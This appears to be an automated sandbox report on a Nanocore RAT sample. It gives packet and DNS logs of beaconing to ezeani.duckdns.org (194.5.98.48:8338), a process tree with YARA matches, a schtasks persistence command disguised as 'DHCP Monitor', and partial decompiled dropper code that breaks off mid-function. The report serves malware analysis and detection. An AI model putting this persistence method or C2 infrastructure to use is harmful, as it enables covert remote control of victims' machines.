Oct 13, 2021 12:03:31.122327089 CEST	49888	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:31.164597034 CEST	8338	49888	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:31.666060925 CEST	49888	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:31.708296061 CEST	8338	49888	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:32.213167906 CEST	49888	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:32.255372047 CEST	8338	49888	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:36.260996103 CEST	49889	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:36.303255081 CEST	8338	49889	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:36.807200909 CEST	49889	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:36.849201918 CEST	8338	49889	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:37.354068995 CEST	49889	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:37.396158934 CEST	8338	49889	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:41.402499914 CEST	49890	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:41.444822073 CEST	8338	49890	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:41.948237896 CEST	49890	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:41.990536928 CEST	8338	49890	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:42.495872974 CEST	49890	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:42.537987947 CEST	8338	49890	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:46.661705017 CEST	49891	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:46.703533888 CEST	8338	49891	194.5.98.48	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 12:00:03.515513897 CEST	60501	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:00:04.606597900 CEST	60501	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:00:04.635221004 CEST	53	60501	8.8.8.8	192.168.2.7
Oct 13, 2021 12:00:04.720504045 CEST	53	60501	8.8.8.8	192.168.2.7
Oct 13, 2021 12:00:11.043402910 CEST	53775	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:00:11.059782028 CEST	53	53775	8.8.8.8	192.168.2.7
Oct 13, 2021 12:00:16.482105017 CEST	51837	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:00:16.594374895 CEST	53	51837	8.8.8.8	192.168.2.7
Oct 13, 2021 12:00:37.563050985 CEST	63668	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:00:37.676948071 CEST	53	63668	8.8.8.8	192.168.2.7
Oct 13, 2021 12:00:42.873667002 CEST	58739	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:00:42.891959906 CEST	53	58739	8.8.8.8	192.168.2.7
Oct 13, 2021 12:00:48.388473034 CEST	60338	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:00:48.500015974 CEST	53	60338	8.8.8.8	192.168.2.7
Oct 13, 2021 12:01:09.613409042 CEST	54911	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:01:09.632004023 CEST	53	54911	8.8.8.8	192.168.2.7
Oct 13, 2021 12:01:14.884824991 CEST	49958	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:01:14.903381109 CEST	53	49958	8.8.8.8	192.168.2.7
Oct 13, 2021 12:01:20.244256973 CEST	50860	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:01:20.355715036 CEST	53	50860	8.8.8.8	192.168.2.7
Oct 13, 2021 12:01:41.013844013 CEST	50452	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:01:41.030483007 CEST	53	50452	8.8.8.8	192.168.2.7
Oct 13, 2021 12:01:46.232563019 CEST	59730	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:01:46.346307039 CEST	53	59730	8.8.8.8	192.168.2.7
Oct 13, 2021 12:01:51.553874016 CEST	59310	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:01:51.665855885 CEST	53	59310	8.8.8.8	192.168.2.7
Oct 13, 2021 12:02:12.380646944 CEST	64296	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:02:12.493659019 CEST	53	64296	8.8.8.8	192.168.2.7
Oct 13, 2021 12:02:17.695481062 CEST	56680	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:02:17.809140921 CEST	53	56680	8.8.8.8	192.168.2.7
Oct 13, 2021 12:02:23.050698996 CEST	58820	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:02:23.162203074 CEST	53	58820	8.8.8.8	192.168.2.7
Oct 13, 2021 12:02:43.923697948 CEST	60983	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:02:44.037075043 CEST	53	60983	8.8.8.8	192.168.2.7
Oct 13, 2021 12:02:49.381719112 CEST	49247	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:02:49.401587009 CEST	53	49247	8.8.8.8	192.168.2.7
Oct 13, 2021 12:02:54.662554026 CEST	52286	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:02:54.679204941 CEST	53	52286	8.8.8.8	192.168.2.7
Oct 13, 2021 12:03:15.359188080 CEST	56064	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:03:15.377491951 CEST	53	56064	8.8.8.8	192.168.2.7
Oct 13, 2021 12:03:20.644177914 CEST	63744	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:03:20.662653923 CEST	53	63744	8.8.8.8	192.168.2.7
Oct 13, 2021 12:03:25.845478058 CEST	61457	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:03:25.959415913 CEST	53	61457	8.8.8.8	192.168.2.7
Oct 13, 2021 12:03:46.546413898 CEST	58367	53	192.168.2.7	8.8.8.8
Oct 13, 2021 12:03:46.660830021 CEST	53	58367	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 12:00:03.515513897 CEST	192.168.2.7	8.8.8.8	0xd9c5	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:04.606597900 CEST	192.168.2.7	8.8.8.8	0xd9c5	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:11.043402910 CEST	192.168.2.7	8.8.8.8	0xc01a	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:16.482105017 CEST	192.168.2.7	8.8.8.8	0x1731	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:37.563050985 CEST	192.168.2.7	8.8.8.8	0x8ee5	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:42.873667002 CEST	192.168.2.7	8.8.8.8	0x3dea	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:48.388473034 CEST	192.168.2.7	8.8.8.8	0x1e7c	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:09.613409042 CEST	192.168.2.7	8.8.8.8	0x2b6d	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:14.884824991 CEST	192.168.2.7	8.8.8.8	0x6eee	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:20.244256973 CEST	192.168.2.7	8.8.8.8	0xf63b	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:41.013844013 CEST	192.168.2.7	8.8.8.8	0xf900	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:46.232563019 CEST	192.168.2.7	8.8.8.8	0x4098	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:51.553874016 CEST	192.168.2.7	8.8.8.8	0xa2c3	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:12.380646944 CEST	192.168.2.7	8.8.8.8	0x52ba	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:17.695481062 CEST	192.168.2.7	8.8.8.8	0x23f	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:23.050698996 CEST	192.168.2.7	8.8.8.8	0x37a0	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:43.923697948 CEST	192.168.2.7	8.8.8.8	0xcf15	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:49.381719112 CEST	192.168.2.7	8.8.8.8	0x3871	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:54.662554026 CEST	192.168.2.7	8.8.8.8	0x2eff	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:15.359188080 CEST	192.168.2.7	8.8.8.8	0x5838	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:20.644177914 CEST	192.168.2.7	8.8.8.8	0x715a	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:25.845478058 CEST	192.168.2.7	8.8.8.8	0xcc67	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:46.546413898 CEST	192.168.2.7	8.8.8.8	0xbd14	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 13, 2021 12:00:04.635221004 CEST	8.8.8.8	192.168.2.7	0xd9c5	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:04.720504045 CEST	8.8.8.8	192.168.2.7	0xd9c5	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:11.059782028 CEST	8.8.8.8	192.168.2.7	0xc01a	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:16.594374895 CEST	8.8.8.8	192.168.2.7	0x1731	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:37.676948071 CEST	8.8.8.8	192.168.2.7	0x8ee5	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:42.891959906 CEST	8.8.8.8	192.168.2.7	0x3dea	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:00:48.500015974 CEST	8.8.8.8	192.168.2.7	0x1e7c	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:09.632004023 CEST	8.8.8.8	192.168.2.7	0x2b6d	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:14.903381109 CEST	8.8.8.8	192.168.2.7	0x6eee	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:20.355715036 CEST	8.8.8.8	192.168.2.7	0xf63b	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:41.030483007 CEST	8.8.8.8	192.168.2.7	0xf900	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:46.346307039 CEST	8.8.8.8	192.168.2.7	0x4098	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:01:51.665855885 CEST	8.8.8.8	192.168.2.7	0xa2c3	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:12.493659019 CEST	8.8.8.8	192.168.2.7	0x52ba	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:17.809140921 CEST	8.8.8.8	192.168.2.7	0x23f	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:23.162203074 CEST	8.8.8.8	192.168.2.7	0x37a0	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:44.037075043 CEST	8.8.8.8	192.168.2.7	0xcf15	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:49.401587009 CEST	8.8.8.8	192.168.2.7	0x3871	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:02:54.679204941 CEST	8.8.8.8	192.168.2.7	0x2eff	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:15.377491951 CEST	8.8.8.8	192.168.2.7	0x5838	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:20.662653923 CEST	8.8.8.8	192.168.2.7	0x715a	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:25.959415913 CEST	8.8.8.8	192.168.2.7	0xcc67	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 12:03:46.660830021 CEST	8.8.8.8	192.168.2.7	0xbd14	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: YdACOWCggQ.exe PID: 4896 Parent PID: 6080

General

Start time:	11:59:30
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\YdACOWCggQ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\YdACOWCggQ.exe'
Imagebase:	0x190000
File size:	1073384 bytes
MD5 hash:	B866823E1F8F4A52376BD108C457DD78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mmuiqlcvwo.pif PID: 5828 Parent PID: 4896

General

Start time:	11:59:49
Start date:	13/10/2021
Path:	C:\Users\user\33920049\mmuiqlcvwo.pif
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Imagebase:	0x830000
File size:	777456 bytes
MD5 hash:	8E699954F6B5D64683412CC560938507
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 27%, Virustotal, Browse Detection: 32%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: RegSvcs.exe PID: 6240 Parent PID: 5828

General

Start time:	11:59:55
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Imagebase:	0xe80000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6272 Parent PID: 6240

General

Start time:	11:59:59
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'
Imagebase:	0x1190000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6280 Parent PID: 6272

General

Start time:	11:59:59
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 6348 Parent PID: 1104

General

Start time:	12:00:00
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
Imagebase:	0xbe0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6364 Parent PID: 6348

General

Start time:	12:00:01
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: YdACOWCggQ.exe PID: 4896 Parent PID: 6080 YdACOWCggQ.exeCOMMON

Executed Functions

Function 001ACBB8, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199
filesleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E001ACBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E0019FD49(__edx, 1);
				E001A95F8("C:\Users\frontdesk\Desktop", 0x800);
				E001A9AA0( &_v208); // executed
				E001A1017(0x1d7370);
				_t74 = 0;
				E001AE920(0x7104, 0x1e5d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E001AB356(0, _t110);
					if( *0x1d9601 == 0) {
						E001AC891(__eflags, _t95);
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0x1ece18, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x1ece18); // executed
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E00193E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0x1d0064 = _t97;
				 *0x1d0060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0x1db704 = _t41;
				 *0x1e5d04 = E001AA4F8(_t89, _t125);
				E0019CFAB(0x1d0078, _t89, 0x1ece18);
				E001A83FC(0);
				E001A83FC(0);
				 *0x1d75e8 = _t107 + 0x5c;
				 *0x1d75ec = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E001AA5D1, _t74); // executed
				 *0x1d75ec = _t74;
				 *0x1d75e8 = _t74;
				E001A84AE(_t107 + 0x24);
				E001A84AE(_t107 + 0x50);
				_t51 =  *0x1ede28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0x1d85f8 != 0) {
					E001A9CA1(0x1ece18);
				}
				E0019E797(0x1e5c00);
				if( *0x1d75e4 > 0) {
					L001B2B4E( *0x1d75e0);
				}
				DeleteObject( *0x1db704);
				_t54 =  *0x1e5d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0x1d00e0 == 0 &&  *0x1d75d7 != 0) {
					E00196E03(0x1d00e0, 0xff);
				}
				_t55 =  *0x1ede2c;
				 *0x1d75d7 = 1;
				if( *0x1ede2c != 0) {
